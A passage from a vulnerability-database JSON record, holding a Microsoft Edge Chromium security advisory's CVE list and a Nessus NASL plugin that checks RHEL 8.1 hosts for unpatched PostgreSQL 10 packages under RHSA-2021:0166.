[CVE-2019-19880](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19880>), [CVE-2019-19925](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19925>), [CVE-2020-6387](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6387>), [CVE-2020-6388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6388>), [CVE-2020-6389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6389>), [CVE-2020-6390](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6390>), [CVE-2020-6391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6391>), [CVE-2020-6392](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6392>), [CVE-2020-6393](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6393>), [CVE-2020-6394](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6394>), [CVE-2020-6395](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6395>), [CVE-2020-6396](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6396>), [CVE-2020-6397](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6397>), [CVE-2020-6398](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6398>), [CVE-2020-6399](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6399>), [CVE-2020-6400](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6400>), [CVE-2020-6401](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6401>), [CVE-2020-6402](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6402>), [CVE-2020-6404](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6404>), [CVE-2020-6405](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6405>), [CVE-2020-6406](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6406>), [CVE-2019-19923](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19923>), [CVE-2020-6408](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6408>), [CVE-2020-6409](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6409>), 
[CVE-2020-6410](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6410>), [CVE-2020-6411](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6411>), [CVE-2020-6412](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6412>), [CVE-2020-6413](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6413>), [CVE-2020-6414](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6414>), [CVE-2020-6415](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6415>), [CVE-2020-6416](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6416>), [CVE-2020-6417](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6417>) \n79.0.309.68 | 1/17/2020 | 79.0.3945.130 | Critical | [CVE-2020-6378](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6378>), [CVE-2020-6379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6379>), [CVE-2020-6380](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6380>), [CVE-2020-0601](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0601>) \n \n* CVEs in **bold** have been reported to be exploited in the wild.\n\n**How can I see the version of the browser?**\n\n 1. In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window\n 2. Click on **Help and Feedback**\n 3. 
Click on **About Microsoft Edge**\n", "edition": 33, "modified": "2021-01-21T08:00:00", "id": "MS:ADV200002", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200002", "published": "2021-01-21T08:00:00", "title": "Chromium Security Updates for Microsoft Edge (Chromium-Based)", "type": "mscve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-22T13:35:39", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0166 advisory.\n\n - postgresql: Selectivity estimators bypass row security policies (CVE-2019-10130)\n\n - postgresql: Stack-based buffer overflow via setting a password (CVE-2019-10164)\n\n - postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution (CVE-2019-10208)\n\n - postgresql: Uncontrolled search path element in logical replication (CVE-2020-14349)\n\n - postgresql: Uncontrolled search path element in CREATE EXTENSION (CVE-2020-14350)\n\n - postgresql: ALTER ... 
DEPENDS ON EXTENSION is missing authorization checks (CVE-2020-1720)\n\n - postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n - postgresql: Multiple features escape security restricted operation sandbox (CVE-2020-25695)\n\n - postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 1, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-21T00:00:00", "title": "RHEL 8 : postgresql:10 (RHSA-2021:0166)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-25695", "CVE-2019-10208", "CVE-2019-10130", "CVE-2020-25694", "CVE-2020-14350", "CVE-2020-25696", "CVE-2020-1720", "CVE-2020-14349", "CVE-2019-10164"], "modified": "2021-01-21T00:00:00", "cpe": ["cpe:/o:redhat:rhel_eus:8.1", "p-cpe:/a:redhat:enterprise_linux:postgresql-plperl", "p-cpe:/a:redhat:enterprise_linux:postgresql-server-devel", "cpe:/a:redhat:rhel_eus:8.1::appstream", "p-cpe:/a:redhat:enterprise_linux:postgresql-upgrade", "p-cpe:/a:redhat:enterprise_linux:postgresql-test-rpm-macros", "p-cpe:/a:redhat:enterprise_linux:postgresql-upgrade-devel", "p-cpe:/a:redhat:enterprise_linux:postgresql-plpython3", "cpe:/o:redhat:rhel_e4s:8.1", "p-cpe:/a:redhat:enterprise_linux:postgresql-pltcl", "p-cpe:/a:redhat:enterprise_linux:postgresql-static", "p-cpe:/a:redhat:enterprise_linux:postgresql-docs", "cpe:/a:redhat:rhel_e4s:8.1::appstream", "p-cpe:/a:redhat:enterprise_linux:postgresql", "p-cpe:/a:redhat:enterprise_linux:postgresql-server", "p-cpe:/a:redhat:enterprise_linux:postgresql-test", "p-cpe:/a:redhat:enterprise_linux:postgresql-contrib"], "id": "REDHAT-RHSA-2021-0166.NASL", "href": "https://www.tenable.com/plugins/nessus/145243", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin 
were\n# extracted from Red Hat Security Advisory RHSA-2021:0166. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145243);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\n \"CVE-2019-10130\",\n \"CVE-2019-10164\",\n \"CVE-2019-10208\",\n \"CVE-2020-1720\",\n \"CVE-2020-14349\",\n \"CVE-2020-14350\",\n \"CVE-2020-25694\",\n \"CVE-2020-25695\",\n \"CVE-2020-25696\"\n );\n script_bugtraq_id(108452, 108875);\n script_xref(name:\"RHSA\", value:\"2021:0166\");\n\n script_name(english:\"RHEL 8 : postgresql:10 (RHSA-2021:0166)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0166 advisory.\n\n - postgresql: Selectivity estimators bypass row security policies (CVE-2019-10130)\n\n - postgresql: Stack-based buffer overflow via setting a password (CVE-2019-10164)\n\n - postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution (CVE-2019-10208)\n\n - postgresql: Uncontrolled search path element in logical replication (CVE-2020-14349)\n\n - postgresql: Uncontrolled search path element in CREATE EXTENSION (CVE-2020-14350)\n\n - postgresql: ALTER ... 
DEPENDS ON EXTENSION is missing authorization checks (CVE-2020-1720)\n\n - postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n - postgresql: Multiple features escape security restricted operation sandbox (CVE-2020-25695)\n\n - postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/89.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/121.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/183.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/270.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/284.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/285.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/327.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10164\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10208\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1720\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14349\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://access.redhat.com/security/cve/CVE-2020-14350\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25694\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25695\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25696\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0166\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1707109\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1719698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1734416\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1798852\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1865744\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1865746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1894423\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1894425\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1894430\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10164\");\n script_cwe_id(20, 89, 121, 183, 270, 284, 285, 327);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/09\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:rhel_e4s:8.1::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:rhel_eus:8.1::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-plperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-plpython3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-pltcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-test-rpm-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-upgrade\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-upgrade-devel\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.1')) audit(AUDIT_OS_NOT, 'Red Hat 8.1', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_e4s_8_1_appstream': [\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-e4s-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_appstream': [\n 'rhel-8-for-aarch64-appstream-eus-debug-rpms',\n 'rhel-8-for-aarch64-appstream-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-appstream-eus-rpms',\n 'rhel-8-for-aarch64-appstream-eus-rpms__8_DOT_1',\n 
'rhel-8-for-aarch64-appstream-eus-source-rpms',\n 'rhel-8-for-aarch64-appstream-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-s390x-appstream-eus-debug-rpms',\n 'rhel-8-for-s390x-appstream-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-s390x-appstream-eus-rpms',\n 'rhel-8-for-s390x-appstream-eus-rpms__8_DOT_1',\n 'rhel-8-for-s390x-appstream-eus-source-rpms',\n 'rhel-8-for-s390x-appstream-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms',\n 'rhel-8-for-x86_64-appstream-eus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-eus-rpms',\n 'rhel-8-for-x86_64-appstream-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-eus-source-rpms',\n 'rhel-8-for-x86_64-appstream-eus-source-rpms__8_DOT_1'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0166');\n}\n\nmodule_ver = get_kb_item('Host/RedHat/appstream/postgresql');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module postgresql:10');\nif ('10' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module postgresql:' + module_ver);\n\nappstreams = {\n 'postgresql:10': [\n {'reference':'postgresql-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n 
{'reference':'postgresql-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-contrib-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-contrib-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-contrib-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-docs-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-docs-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-docs-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-plperl-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-plperl-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-plperl-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 
'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-plpython3-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-plpython3-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-plpython3-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-pltcl-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-pltcl-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-pltcl-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-server-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-server-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-server-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n 
{'reference':'postgresql-server-devel-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-server-devel-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-server-devel-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-static-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-static-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-static-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-test-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-test-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-test-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-test-rpm-macros-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 
'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-test-rpm-macros-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-test-rpm-macros-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-upgrade-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-upgrade-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-upgrade-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-upgrade-devel-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-upgrade-devel-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-upgrade-devel-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']}\n ]\n};\n\nflag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n appstream = NULL;\n appstream_name = NULL;\n appstream_version = NULL;\n appstream_split = split(module, sep:':', 
keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = 